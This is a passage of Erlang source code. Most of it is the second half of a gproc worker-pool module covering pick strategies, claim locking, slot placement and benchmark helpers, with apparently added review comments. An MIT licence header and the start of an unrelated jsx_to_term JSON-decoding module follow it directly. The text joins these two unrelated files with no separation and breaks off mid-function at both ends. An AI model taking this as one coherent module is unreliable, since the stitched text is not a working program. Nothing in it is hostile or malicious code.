ret(Pick, Ret)
end;
_ ->
%% Ran past this pool's entries: wrap around to the lowest slot.
case ets:next(gproc, {{n,l,[?MODULE,Pool,0]}, n}) of
{{n,l,[?MODULE,Pool,Actual1,_Name1]} = Pick, _} ->
incr(Pool, Sz-Next+Actual1, Sz),
%% gproc:update_counter(
%% ?POOL_CUR(Pool), shared, {Sz-Next+Actual1, Sz, 1}),
ret(Pick, Ret);
_ ->
%% No connected workers at all.
false
end
end;
%% random: uniform starting slot; pick_near scans forward from there.
pick(Pool, Sz, random, Ret) ->
pick_near(Pool, rand:uniform(Sz), Ret).
%% Value-directed selection for `hash' and `direct' pools.
%% hash: map the hash of Val onto a slot in 1..Sz.
%% direct: treat N as a 1-based index wrapping modulo the pool size;
%% N rem Sz is 0 for exact multiples, which denotes slot Sz.
%% (The original `(N rem Sz-1) + 1' is exactly `N rem Sz', since
%% `rem' binds tighter than binary minus.)
pick(Pool, Sz, hash, Val, Ret) ->
    pick_near(Pool, erlang:phash2(Val, Sz) + 1, Ret);
pick(Pool, Sz, direct, N, Ret) when is_integer(N), N > 0 ->
    Slot = case N rem Sz of
               0 -> Sz;
               Rem -> Rem
           end,
    pick_near(Pool, Slot, Ret).
%% Return the first registered worker at slot >= N, wrapping to the
%% lowest slot when nothing is found at or after N; false if the pool
%% has no connected workers. (The probe key {n,l,[?MODULE,Pool,N]}
%% sorts just before any worker name {n,l,[?MODULE,Pool,N,Name]}.)
pick_near(Pool, N, Ret) ->
case ets:next(gproc, {{n,l,[?MODULE,Pool,N]}, n}) of
{{n,l,[?MODULE,Pool,_,_]} = Pick, _} ->
ret(Pick, Ret);
_ ->
%% wrap
case ets:next(gproc, {{n,l,[?MODULE,Pool,1]}, n}) of
{{n,l,[?MODULE,Pool,_,_]} = Pick, _} ->
ret(Pick, Ret);
_ ->
false
end
end.
%% Resolve the picked name according to the requested return form.
ret(Name, name) ->
Name;
ret(Name, pid) ->
%% Direct ets lookup of the registration entry {{Name,n}, Pid, Value}.
case ets:lookup(gproc, {Name,n}) of
[{_, Pid, _}] ->
Pid;
[] ->
%% possible race
false
end.
%% @equiv claim(Pool, F, nowait)
%% The is_function/2 guard enforces that F takes (Name, Pid).
claim(Pool, F) when is_function(F, 2) ->
claim(Pool, F, nowait).
%% @spec claim(Pool, Fun, Wait) -> {true, Res} | false
%% Pool = any()
%% Fun = function()
%% Wait = nowait | {busy_wait, integer()}
%%
%% @doc Picks the first available worker in the pool and applies `Fun'.
%%
%% A `claim' pool allows the caller to "claim" a worker during a short span
%% (essentially, a lock is set and released as soon as `Fun' returns).
%% Once a worker is selected, `Fun(Name, Pid)' is called, where `Name' is a
%% unique gproc name of the worker, and `Pid' is its process identifier.
%% The gproc name of the worker serves as a mutex, where its value is 0 (zero)
%% if the worker is free, and 1 (one) if it is busy. The mutex operation is
%% implemented using `gproc:update_counter/2'.
%%
%% `Wait == nowait' means that the call will return `false' immediately if
%% there is no available worker.
%%
%% `Wait == {busy_wait, Timeout}' will keep repeating the claim attempt
%% for `Timeout' milliseconds. If still no worker is available, it will
%% return `false'.
%% @end
claim(Pool, F, Wait) ->
%% Only 'claim' pools support claiming; empty pools yield false.
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{_, claim} ->
W = setup_wait(Wait, Pool),
claim_w(Pool, F, W);
_ ->
error(badarg)
end.
%% Retry loop: keep attempting until a worker is claimed or the wait
%% budget is exhausted (do_wait/1 returns 'timeout').
claim_w(_Pool, _F, timeout) ->
false;
claim_w(Pool, F, W) ->
case claim_(Pool, F) of
false ->
claim_w(Pool, F, do_wait(W));
Other ->
clear_wait(W),
Other
end.
%% Define how many workers to select in each chunk. We want to strike
%% a good compromise between the cost of succeeding on the first try
%% (likely a common event) and the cost of retrying. In my measurements,
%% if a chunk size of 1 costs ca 30 us (on my Macbook), a chunk size of 5
%% adds only ca 20% to the cost, i.e. a few us.
-define(CLAIM_CHUNK, 5).
%% Scan connected workers in chunks of ?CLAIM_CHUNK, attempting to
%% claim each one whose mutex value is 0 (free). The match spec
%% returns {Name, Pid} pairs for free workers of this pool only.
claim_(Pool, F) ->
%% Sorry, but we use ets:select/3 here in order to shave off a few us.
case ets:select(gproc, [{ {{{n,l,[?MODULE,Pool,'_','_']},n}, '$1', 0}, [],
[{{ {element,1,{element,1,'$_'}}, '$1' }}]}],
?CLAIM_CHUNK) of
{[_|_] = Workers, Cont} ->
case try_claim(Workers, F) of
{true, _} = True ->
True;
false ->
claim_cont(Cont, F)
end;
_ ->
false
end.
%% Continue a chunked ets:select scan started in claim_/2.
claim_cont('$end_of_table', _) ->
false;
claim_cont(Cont, F) ->
case ets:select(Cont) of
{[_|_] = Workers, Cont1} ->
case try_claim(Workers, F) of
{true, _} = True ->
True;
false ->
claim_cont(Cont1, F)
end;
_ ->
false
end.
%% Try each candidate in turn until one claim succeeds.
try_claim([], _) ->
false;
try_claim([{K,Pid}|T], F) ->
case try_claim(K, Pid, F) of
false ->
try_claim(T, F);
Other ->
Other
end.
%% Attempt to take the worker's mutex. The two-op update_counter reads
%% the current value (add 0) and then increments with clamp {1,1,1}:
%% [0, 1] means we flipped it free->busy; [1, 1] means already busy.
try_claim(K, Pid, F) ->
case gproc:update_counter(K, [0, {1, 1, 1}]) of
[0, 1] ->
%% have lock
execute_claim(F, K, Pid);
[1, 1] ->
%% no
false
end.
%% Wrapper to handle the case where the claimant gets killed by another
%% process while executing within the critical section.
%% This is likely a rare case, but if it happens, the claim would never
%% get released.
%% Solution:
%% - spawn a monitoring process which resets the claim if the parent dies
%% (spawn_link() might be more efficient, but we cannot enable trap_exit
%% atomically, which introduces a race condition).
%% - for all return types, kill the monitor and release the claim.
%% - the one case where the monitor *isn't* killed is when Parent itself
%% is killed before executing the `after' clause. In this case, it should
%% be safe to release the claim from the monitoring process.
%%
%% Overhead in the normal case:
%% - spawning the monitoring process
%% - (possibly scheduling the monitoring process to set up the monitor)
%% - killing the monitoring process (untrappably)
%% Timing the overhead over 100,000 claims on a Core i7 MBP running OTP 17,
%% this wrapper increases the cost of a minimal claim from ca 3 us to
%% ca 7-8 us.
%% Run the claimant's fun while holding K's mutex, guaranteeing the
%% mutex is reset even if the caller is killed mid-execution (see the
%% commentary above). Returns {true, Result-of-F}; exceptions from F
%% propagate after the 'after' clause releases the claim.
execute_claim(F, K, Pid) ->
Parent = self(),
Mon = spawn(
fun() ->
Ref = erlang:monitor(process, Parent),
receive
{'DOWN', Ref, _, _, _} ->
gproc:reset_counter(K)
end
end),
try begin
Res = F(K, Pid),
{true, Res}
end
after
exit(Mon, kill),
gproc:reset_counter(K)
end.
%% Encode the wait policy: 'nowait' gives up after one attempt;
%% busy_wait arms a timer whose remaining time serves as the deadline.
%% NOTE(review): the {claim, Pool} message may already have been
%% delivered when the timer is cancelled and is never flushed from the
%% caller's mailbox -- verify callers tolerate this.
setup_wait(nowait, _) ->
nowait;
setup_wait({busy_wait, MS}, Pool) ->
Ref = erlang:send_after(MS, self(), {claim, Pool}),
{busy_wait, Ref}.
%% One wait step between claim attempts; 'timeout' once the deadline
%% has passed (read_timer/1 returns false for an expired timer).
do_wait(nowait) ->
timeout;
do_wait({busy_wait, Ref} = W) ->
%% Yielding here serves two purposes:
%% 1) Increase the chance that whoever's before us can finish
%% 2) The value of read_timer/1 only refreshes after yield (so I've heard)
erlang:yield(),
case erlang:read_timer(Ref) of
false ->
erlang:cancel_timer(Ref),
timeout;
_ ->
W
end.
%% Release any armed deadline timer.
clear_wait(nowait) ->
ok;
clear_wait({busy_wait, Ref}) ->
erlang:cancel_timer(Ref),
ok.
%% @spec log(GprocKey) -> integer()
%% @doc Update a counter associated with a worker name.
%%
%% Each added worker has a gproc counter that can be used e.g. to keep track of
%% the number of times the worker has been picked. Since it's associated with the
%% named 'slot', and not to the connected worker, its value will persist even
%% if the currently connected worker dies.
%% @end
log({n,l,[?MODULE,Pool,_,Name]}) ->
%% Bump the shared per-slot counter; counts survive worker restarts
%% because the counter belongs to the slot, not the connected process.
gproc:update_shared_counter(?POOL_WRK(Pool,Name), 1).
%% @spec randomize(Pool::any()) -> integer()
%% @doc Randomizes the "next" pointer for the pool.
%%
%% This function only has an effect for `round_robin' pools, which have a
%% reference to the next worker to be picked. Without randomizing, the load
%% balancing will always start with the first worker in the pool.
%% @end
%% Move the round_robin 'next' pointer to a random position.
%% Pools of size 0 or 1 have nothing to randomize; the size itself is
%% returned in those cases, otherwise the result of incr/3.
randomize(Pool) ->
    Sz = pool_size(Pool),
    if
        Sz =< 1 ->
            Sz;
        true ->
            incr(Pool, rand:uniform(Sz) - 1, Sz)
    end.
%% @spec pool_size(Pool::any()) -> integer()
%% @doc Return the size of the pool.
%%
pool_size(Pool) ->
%% Size is the first element of the pool's shared {Size, Type} value.
{Sz, _} = gproc:get_value(?POOL(Pool), shared),
Sz.
%% ===================================================================
%% Start, stop, call gen_server
%% @private
start_link() ->
%% Singleton management server, registered under the module name.
gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).
%% @private
init([]) ->
%% The server keeps no state of its own; all pool state lives in gproc.
{ok, #st{}}.
%% @private
%% Issue a synchronous request to the pool server, converting the
%% server's badarg-style replies back into exceptions in the caller.
call(Req) ->
    Reply = gen_server:call(?MODULE, Req),
    case Reply of
        badarg          -> error(badarg);
        {badarg, Cause} -> error(Cause);
        _               -> Reply
    end.
%% ===================================================================
%% Gen_server callbacks
%% @private
handle_call(Req, From, S) ->
%% Convert errors raised by the management functions into
%% {badarg, Reason} replies; call/1 re-raises them in the client.
try handle_call_(Req, From, S)
catch
error:Reason ->
{reply, {badarg, Reason}, S}
end.
%% Serialized pool-management operations. Each clause performs the
%% work and replies with the result; errors raised by the worker
%% functions become {badarg, Reason} replies via handle_call/3 above.
handle_call_({new, Pool, Type, Opts}, _, S) ->
    new_(Pool, Type, Opts),
    {reply, ok, S};
handle_call_({delete, Pool}, _, S) ->
    delete_(Pool),
    {reply, ok, S};
handle_call_({force_delete, Pool}, _, S) ->
    force_delete_(Pool),
    {reply, ok, S};
handle_call_({add_worker, Pool, Name}, _, S) ->
    N = add_worker_(Pool, Name),
    {reply, N, S};
handle_call_({add_worker, Pool, Name, Pos}, _, S) ->
    N = add_worker_(Pool, Name, Pos),
    {reply, N, S};
handle_call_({set_pool_size, Pool, Sz}, _, S) ->
    %% FIX: get_workers_/1 takes the gproc pool key, not the bare pool
    %% name -- every other call site passes ?POOL(Pool) (and this very
    %% clause does so two lines below). Passing the bare name made the
    %% workers lookup hit the wrong key and fail.
    Workers = get_workers_(?POOL(Pool)),
    case get_last_worker_n(Workers) of
        N when N > Sz ->
            %% Cannot shrink below the highest occupied slot.
            {reply, badarg, S};
        _ ->
            set_pool_size_(?POOL(Pool), Sz, Workers),
            {reply, true, S}
    end;
handle_call_({remove_worker, Pool, Name}, _, S) ->
    ok = remove_worker_(Pool, Name),
    {reply, true, S}.
%% @private
%% Casts are not part of the protocol; ignore them.
handle_cast(_, S) ->
{noreply, S}.
%% @private
%% Unexpected messages are dropped silently.
handle_info(_, S) ->
{noreply, S}.
%% @private
terminate(_, _) ->
ok.
%% @private
code_change(_, S, _) ->
{ok, S}.
%% ===================================================================
%% Internal functions
%% Create the pool's gproc resources: a shared property holding
%% {Size, Type} (plus option attributes and the slot list), and the
%% shared 'cur' counter used by round_robin picks.
new_(Pool, Type, Opts) ->
valid_type(Type),
Size = proplists:get_value(size, Opts, 0),
Workers = lists:seq(1, Size),
K = ?POOL(Pool),
%% The shared registration doubles as the existence check.
try gproc:reg_shared(K, {Size, Type})
catch
error:_ -> error(exists)
end,
%% auto_size defaults to true exactly when no explicit size was given.
Opts1 =
case lists:keyfind(auto_size, 1, Opts) of
false ->
Opts ++ [{auto_size, not lists:keymember(size, 1, Opts)}];
{_, Bool} when is_boolean(Bool) ->
Opts
end,
gproc:set_attributes_shared(K, Opts1),
set_workers(K, Workers),
gproc:reg_shared(?POOL_CUR(Pool), Size).
%% Assert that Type is a supported load-balancing strategy.
%% Returns true, or raises 'invalid_type'.
valid_type(Type) ->
    case lists:member(Type, [round_robin, hash, random, direct, claim]) of
        true -> true;
        false -> error(invalid_type)
    end.
%% Resize the slot list to exactly Sz entries -- truncating trailing
%% slots or appending fresh integer placeholders -- then store the new
%% {Sz, Type} as the pool's shared value.
set_pool_size_(K, Sz, Workers) ->
{_, Type} = gproc:get_value(K, shared),
case length(Workers) of
Sz ->
set_workers(K, Workers);
Len when Len > Sz ->
Workers1 = lists:sublist(Workers, 1, Sz),
set_workers(K, Workers1);
Len when Len < Sz ->
Workers1 = Workers ++ lists:seq(Len+1, Sz),
set_workers(K, Workers1)
end,
gproc:set_value_shared(K, {Sz, Type}).
delete_(Pool) ->
K = ?POOL(Pool),
Ws = get_workers_(K),
%% Any {Name, Pos} tuple left in the slot list means workers are still
%% defined, so refuse to delete.
case [1 || {_,_} <- Ws] of
[] ->
gproc:unreg_shared(K),
gproc:unreg_shared(?POOL_CUR(Pool));
[_|_] ->
error(not_empty)
end.
%% Tear down every gproc resource belonging to Pool and kill all
%% connected workers, except the calling process whose registration is
%% removed cleanly instead.
force_delete_(Pool) ->
Props = gproc:select({l,p}, [{ {?POOL(Pool), '_', '_'}, [], ['$_']}]),
Cur = gproc:select({l,c}, [{ {?POOL_CUR(Pool), '_', '_'}, [], ['$_']}]),
Workers = gproc:select(
{l,c}, [{ {?POOL_WRK(Pool,'_'), '_', '_'}, [], ['$_']}]),
Names = find_names(Pool, '_'),
lists:foreach(
fun({Key, Pid, _}) when Pid == self() -> gproc:unreg(Key);
({_, Pid, _}) when is_pid(Pid) -> exit(Pid, kill)
end, Names),
[gproc:unreg_shared(W) || {W,shared,_} <- Cur ++ Props ++ Workers],
true.
%% All registered worker names for Pool.
%% NOTE(review): the second argument is substituted into the *position*
%% element of the name pattern, not the pid column of the table; the
%% only caller passes '_' so this is harmless, but the parameter name
%% 'Pid' is misleading.
find_names(Pool, Pid) ->
gproc:select(
{l,n}, [{ {{n,l,[?MODULE,Pool,Pid,'_']}, '_', '_'}, [], ['$_']}]).
%% Server-side: place Name in the first suitable slot (placement is
%% strategy-dependent, see find_slot/6), growing the pool when
%% auto_size permits, then create the worker's shared counter.
add_worker_(Pool, Name) ->
K = ?POOL(Pool),
{Sz, Type} = gproc:get_value(K, shared),
AutoSz = gproc:get_attribute(K, shared, auto_size),
Ws0 = get_workers_(K),
{N,Ws1} =
case lists:keymember(Name, 1, Ws0) of
false ->
case find_slot(Name, K, Ws0, Sz, Type, AutoSz) of
{_, _} = Res ->
Res;
false ->
error(pool_full)
end;
true ->
error(exists)
end,
if N > Sz ->
set_pool_size_(K, N, Ws1); % also calls set_workers/2
true ->
%% size not changed
set_workers(K, Ws1)
end,
reg_worker(Pool, Name, N),
N.
%% Server-side: place Name at an explicit position, growing the pool
%% when auto_size allows; refuses to overwrite an occupied slot.
%% NOTE(review): unlike add_worker_/2 there is no check that Name
%% already occupies some other slot; presumably reg_worker/3 then
%% fails on the duplicate shared counter -- verify.
add_worker_(Pool, Name, Pos) ->
K = ?POOL(Pool),
{Sz, _} = gproc:get_value(K, shared),
Ws0 = get_workers_(K),
if Pos > Sz ->
case gproc:get_attribute(K, shared, auto_size) of
true ->
%% Pad with free slots up to Pos-1, then append the worker.
Ws1 = Ws0 ++ lists:seq(Sz+1,Pos-1) ++ [{Name, Pos}],
set_pool_size_(K, Pos, Ws1);
false ->
error(out_of_range)
end;
true ->
case lists:nth(Pos, Ws0) of
{_,_} -> error(exists);
P when is_integer(P) ->
Ws1 = set_pos(Pos, Ws0, {Name, Pos}),
set_workers(K, Ws1)
end
end,
reg_worker(Pool, Name, Pos),
Pos.
%% Create the worker's shared pick-counter and record its position as
%% attribute 'n' (read back by worker_id/2).
reg_worker(Pool, Name, Pos) ->
gproc:reg_shared(Wrk = ?POOL_WRK(Pool, Name), 0),
gproc:set_attributes_shared(Wrk, [{n, Pos}]).
remove_worker_(Pool, Name) ->
case whereis_worker(Pool, Name) of
Pid when is_pid(Pid) ->
error({worker_connected, Pid});
undefined ->
do_remove_worker_(Pool, Name)
end.
do_remove_worker_(Pool, Name) ->
K = ?POOL(Pool),
Ws0 = get_workers_(K),
Ws1 = del_slot(Name, Ws0),
gproc:unreg_shared(?POOL_WRK(Pool, Name)),
case (NewLen = length(Ws1)) - length(Ws0) of
0 -> ok;
Diff when Diff < 0 ->
{_, Type} = gproc:get_value(K, shared),
gproc:set_value_shared(K, {NewLen, Type})
end,
gproc:set_attributes_shared(K, [{workers, Ws1}]),
ok.
%% Drop Name's slot from the worker list. A trailing occupied slot is
%% truncated away entirely; an interior slot is left behind as its bare
%% (free) position number.
del_slot(Name, [{Name, _Pos}]) ->
    [];
del_slot(Name, [{Name, Pos} | Rest]) ->
    [Pos | Rest];
del_slot(Name, [Keep | Rest]) ->
    [Keep | del_slot(Name, Rest)].
%% Choose a slot for a new worker. An empty worker list means a brand-new
%% pool: position 1 is used unless the pool is fixed at size zero.
%% Otherwise placement is delegated to the strategy-specific helper.
find_slot(Name, _, [], Sz, _, Auto) ->
    case {Sz, Auto} of
        {0, false} -> false;
        {_, _} ->
            {1, [{Name, 1}]}
    end;
find_slot(Name, Key, Workers, Sz, Type, AutoSz) ->
    case get_strategy(Key, Type) of
        packed ->
            find_slot_packed(Name, Workers, AutoSz);
        sparse ->
            find_slot_sparse(Name, Workers, Sz, AutoSz)
    end.
%% find_slot(Name, Key, Workers, Sz, Type, AutoSz, Strategy).
%% find_slot(Name, []) ->
%% {1, [{Name, 1}]};
%% find_slot(Name, Slots) ->
%% find_slot(Name, Slots, []).
%% Highest position holding an occupied ({Name, Pos}) slot; 0 when every
%% slot is free.
get_last_worker_n(Workers) ->
    get_last_worker_n(Workers, 0, 1).

get_last_worker_n([], Highest, _Pos) ->
    Highest;
get_last_worker_n([{_, _} | Rest], _Prev, Pos) ->
    get_last_worker_n(Rest, Pos, Pos + 1);
get_last_worker_n([Free | Rest], Highest, Pos) when is_integer(Free) ->
    get_last_worker_n(Rest, Highest, Pos + 1).
%% Packed placement: take the first free (integer) slot. If every slot is
%% occupied and the pool may grow, append a new slot after the last one;
%% otherwise report the pool as full.
find_slot_packed(Name, Workers, AutoSz) ->
    find_slot_packed(Name, Workers, AutoSz, []).

find_slot_packed(Name, [Free | Rest], _, Seen) when is_integer(Free) ->
    %% free slot found
    {Free, lists:reverse(Seen) ++ [{Name, Free} | Rest]};
find_slot_packed(_, [_], false, _) ->
    false;
find_slot_packed(Name, [{_, LastPos} = Last], true, Seen) ->
    %% last element reached; expand the pool
    NewPos = LastPos + 1,
    {NewPos, lists:reverse([{Name, NewPos}, Last | Seen])};
find_slot_packed(Name, [{_, _} = Taken | Rest], Auto, Seen) ->
    find_slot_packed(Name, Rest, Auto, [Taken | Seen]).
%% Sparse placement: put the new worker in the middle of the largest run
%% of free slots, treating the slot list as circular (the gap may wrap
%% from the last occupied slot around to the first). Returns false when
%% the pool is full and may not grow.
find_slot_sparse(Name, Ws, Sz, Auto) ->
    %% Collect the position of the first and last filled slots, as well as
    %% the largest gap between filled slots
    %% Fold state: [] until the first occupied slot is seen, thereafter
    %% {Prev, StartP, First, Last, Max, MaxP} where Prev counts the free
    %% run in progress, StartP is where it started, and Max/MaxP track the
    %% largest gap seen so far.
    case lists:foldl(
           fun(N, {Prev, StartP, First, Last, Max, MaxP}) when is_integer(N) ->
                   case Prev+1 of
                       Gap when Gap > Max ->
                           {Gap, StartP, First, Last, Gap, StartP};
                       Gap ->
                           {Gap, StartP, First, Last, Max, MaxP}
                   end;
              (N, []) when is_integer(N) ->
                   %% skip
                   [];
              ({_, Pos}, []) ->
                   {0, Pos, _First = Pos, _Last = Pos, 0, 0};
              ({_, Pos}, {Prev, StartP, First, _PrevLast, Max, MaxP}) ->
                   if Prev > Max ->
                           {0, Pos, First, Pos, Prev, StartP};
                      true ->
                           {0, Pos, First, Pos, Max, MaxP}
                   end
           end, [], Ws) of
        [] ->
            %% all empty slots
            case {Sz, Auto} of
                {0, false} ->
                    false;
                {0, true} ->
                    {1, [{Name, 1}]};
                {_, _} when is_integer(Sz), Sz > 0 ->
                    {1, [{Name, 1}|tl(Ws)]}
            end;
        {_, _, 1, Last, 0, _} ->
            %% Pool full
            if Auto ->
                    NewPos = Last + 1,
                    {NewPos, Ws ++ [{Name, NewPos}]};
               true ->
                    false
            end;
        {_, _, First, Last, MaxGap, StartPos} ->
            %% WrapGap is the circular gap from the last occupied slot,
            %% past the end of the list, to the first occupied slot.
            WrapGap = (Sz - Last) + First - 1,
            NewPos = if WrapGap >= MaxGap ->
                             (Last + (WrapGap div 2) + 1) rem (Sz+1);
                        true ->
                             (StartPos + (MaxGap div 2) + 1) rem (Sz+1)
                     end,
            {NewPos, set_pos(NewPos, Ws, {Name, NewPos})}
    end.
%% Replace the element at 1-based position Pos in List with Elem.
set_pos(Pos, List, Elem) when Pos > 0, is_list(List) ->
    set_pos(Pos, 1, List, Elem).

set_pos(Pos, Pos, [_Replaced | Rest], Elem) ->
    [Elem | Rest];
set_pos(Pos, Cur, [Keep | Rest], Elem) when Cur < Pos ->
    [Keep | set_pos(Pos, Cur + 1, Rest, Elem)].
%% The workers attribute is a positional list where {Name, Pos} marks an
%% occupied slot and a bare integer marks a free one. An unset attribute
%% is treated as the empty list.
get_workers_(K) ->
    case gproc:get_attribute(K, shared, workers) of
        undefined ->
            [];
        L when is_list(L) ->
            L
    end.

%% Store the workers attribute on the pool's shared property.
set_workers(K, L) when is_list(L) ->
    gproc:set_attributes_shared(K, [{workers, L}]).
%% Fill strategy for the pool: an explicit fill_strategy attribute wins,
%% otherwise the default implied by the pool type is used.
get_strategy(Key, Type) ->
    attribute(Key, fill_strategy, default_strategy(Type)).

default_strategy(round_robin) -> packed;
default_strategy(random)      -> sparse;
default_strategy(hash)        -> sparse;
default_strategy(direct)      -> packed;
default_strategy(claim)       -> packed.
%% Shared-attribute lookup with a default for unset attributes.
attribute(Key, A, Default) ->
    case gproc:get_attribute(Key, shared, A) of
        undefined -> Default;
        Value -> Value
    end.

%% Advance the round-robin position counter by Incr, wrapping back to 1
%% when it passes Sz.
incr(Pool, Incr, Sz) ->
    gproc:update_counter(?POOL_CUR(Pool), shared, {Incr, Sz, 1}).
%% find_worker(Pool, Name) ->
%% case gproc:select(n, [{ {{n, l, {?MODULE, Pool, '_'}}, '_', Name},
%% [], ['$_'] }]) of
%% [] ->
%% undefined;
%% [{{n,l,{?MODULE,_,N}}, Pid, _}] ->
%% {N, Pid}
%% end.
%% ============================= Test code ===========================
%% @private
test(N) when N > 0 ->
    test(N, round_robin, []).

%% @private
%% Set up a throwaway pool (named after the current source line), run the
%% benchmark function appropriate for Type N times via timer:tc/3, and
%% tear the pool down again.
test(N, Type, Opts) when Type==round_robin;
                         Type==random;
                         Type==hash;
                         Type==direct;
                         Type==claim ->
    P = ?LINE,
    setup_test_pool(P, Type, Opts),
    try timer:tc(?MODULE, f(Type), [N, P])
    after
        remove_test_pool(P)
    end.

%% Parallel variant: spawn N monitored processes, each performing I picks
%% against the same pool, and collect their timings.
ptest(N, I, Type, Opts) ->
    P = ?LINE,
    setup_test_pool(P, Type, Opts),
    F = f(Type),
    Pids =
        [spawn_monitor(fun() -> exit({ok, timer:tc(?MODULE, F, [I, P])}) end)
         || _ <- lists:seq(1, N)],
    try collect(Pids)
    after
        remove_test_pool(P)
    end.

%% Await every monitored benchmark process; return the individual total
%% times, their mean, and the mean per-pick average.
collect(Pids) ->
    Results = [receive
                   {'DOWN', Ref, _, _, Reason} ->
                       Reason
               end || {_, Ref} <- Pids],
    {Times, Avgs} = lists:foldr(fun({ok, {T, Avg}}, {A,B}) ->
                                        {[T|A], [Avg|B]} end,
                                {[],[]}, Results),
    {Times, lists:sum(Times)/length(Times),
     lists:sum(Avgs)/length(Avgs)}.

%% Pick the benchmark entry point appropriate for the pool type.
f(Type) when Type==hash; Type==direct ->
    test_run1;
f(Type) when Type==claim ->
    test_run2;
f({empty,_}) ->
    test_run0;
f(_) ->
    test_run.
%% @private
setup_test_pool(P, Type, Opts) ->
    setup_test_pool(P, Type, Opts, test_workers()).

%% Create the pool and add/connect each worker, logging the evolving
%% workers attribute after every addition.
setup_test_pool(P, Type0, Opts, Workers) ->
    Type = case Type0 of {_, T} -> T; T when is_atom(T) -> T end,
    new(P, Type, Opts),
    [begin R = add_worker(P, W),
           io:fwrite("add_worker(~p, ~p) -> ~p; Ws = ~p~n",
                     [P, W, R, get_workers_(?POOL(P))]),
           connect_worker(P, W)
     end || W <- Workers].

%% @private
%% Print per-worker pick counters, then disconnect/remove each worker and
%% delete the pool.
remove_test_pool(P) ->
    io:fwrite("worker stats (~p):~n"
              "~p~n", [P, gproc:select(
                            {l,c},
                            [{ {{c,l,{?MODULE,P,w,'$1'}},'_','$2'}, [],
                               [{{'$1','$2'}}] }])]),
    [begin disconnect_worker(P, W),
           remove_worker(P, W)
     end || W <- test_workers()],
    delete(P).

%% Fixed worker names used by the test helpers.
test_workers() -> [a,b,c,d,e,f].
%% @private
%% Benchmark loop for plain pick/1 pools; returns the mean time per pick
%% in microseconds (S = accumulated time, M = iteration count).
test_run(N, P) ->
    test_run(N, P, 0, 0).

test_run(N, P, S, M) when N > 0 ->
    {T, Worker} = timer:tc(?MODULE, pick, [P]),
    true = (Worker =/= false),
    log(Worker),
    timer:sleep(rand:uniform(49)),
    test_run(N-1, P, S+T, M+1);
test_run(_, _, S, M) ->
    S/M.

%% @private
%% As test_run/2 but exercising pick/2 (hash/direct pools), using the
%% loop counter as the pick argument.
test_run1(N, P) ->
    test_run1(N, P, 0, 0).

test_run1(N, P, S, M) when N > 0 ->
    {T, Worker} = timer:tc(?MODULE, pick, [P, N]),
    true = (Worker =/= false),
    log(Worker),
    timer:sleep(rand:uniform(49)),
    test_run1(N-1, P, S+T, M+1);
test_run1(_, _, S, M) ->
    S/M.

%% @private
%% As test_run/2 but exercising claim/3 with a busy-wait timeout; the
%% claim callback logs the pick and sleeps briefly to simulate work.
test_run2(N, P) ->
    test_run2(N, P, fun(K,_) ->
                            R = log(K),
                            timer:sleep(rand:uniform(49)),
                            R
                    end, 0, 0).

test_run2(N, P, F, S, M) when N > 0 ->
    {T, {true, _}} = timer:tc(?MODULE, claim, [P, F, {busy_wait, 5000}]),
    test_run2(N-1, P, F, S+T, M+1);
test_run2(_, _, _, S, M) ->
    S/M.
%% @private
%% No-op benchmark loop used for the {empty, _} pool type: measures pure
%% loop overhead without touching the pool. (The closing line previously
%% had extraction junk fused onto it, which broke compilation.)
test_run0(N, X) when N > 0 ->
    test_run0(N-1, X);
test_run0(_, _) ->
    ok.
%% The MIT License
%% Copyright (c) 2011 <NAME> <<EMAIL>>
%% Permission is hereby granted, free of charge, to any person obtaining a copy
%% of this software and associated documentation files (the "Software"), to deal
%% in the Software without restriction, including without limitation the rights
%% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
%% copies of the Software, and to permit persons to whom the Software is
%% furnished to do so, subject to the following conditions:
%% The above copyright notice and this permission notice shall be included in
%% all copies or substantial portions of the Software.
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
%% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
%% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
%% AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
%% LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
%% OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
%% THE SOFTWARE.
-module(jsx_to_term).
-export([to_term/2]).
-export([init/1, handle_event/2]).
-record(opts, {
labels = binary
}).
-type opts() :: list().
%% Decode a JSON source into an Erlang term. The spec previously declared
%% a binary() result, but decoding yields a term (see the eunit tests
%% below, e.g. to_term(<<"{}">>, []) =:= [{}]).
-spec to_term(Source::(binary() | list()), Opts::opts()) -> term().

to_term(Source, Opts) when is_list(Opts) ->
    (gen_json:parser(?MODULE, Opts, jsx_utils:extract_opts(Opts)))(Source).
%% Fold the raw option list into an #opts{} record. Later occurrences of
%% an option override earlier ones; unrecognised options are ignored.
parse_opts(Opts) ->
    lists:foldl(fun parse_opt/2, #opts{}, Opts).

parse_opt({labels, Val}, Opts)
        when Val == binary; Val == atom; Val == existing_atom ->
    Opts#opts{labels = Val};
parse_opt(labels, Opts) ->
    Opts#opts{labels = binary};
parse_opt(_, Opts) ->
    Opts.
%% Parser state: {Stack, Opts} where Stack is a list of partially-built
%% containers, innermost first, each accumulated in reverse order.
init(Opts) -> {[[]], parse_opts(Opts)}.

%% end_json: the outermost accumulator holds the single finished term.
handle_event(end_json, {[[Terms]], _Opts}) -> Terms;

%% Entering a container pushes a fresh accumulator onto the stack.
handle_event(start_object, {Terms, Opts}) -> {[[]|Terms], Opts};
%% Closing an object: reverse the accumulated pairs (an empty object is
%% represented as [{}]) and attach the result either under a pending
%% {key, _} marker or directly to the enclosing container.
handle_event(end_object, {[[], {key, Key}, Last|Terms], Opts}) ->
    {[[{Key, [{}]}] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[Object, {key, Key}, Last|Terms], Opts}) ->
    {[[{Key, lists:reverse(Object)}] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[[], Last|Terms], Opts}) ->
    {[[[{}]] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[Object, Last|Terms], Opts}) ->
    {[[lists:reverse(Object)] ++ Last] ++ Terms, Opts};

handle_event(start_array, {Terms, Opts}) -> {[[]|Terms], Opts};
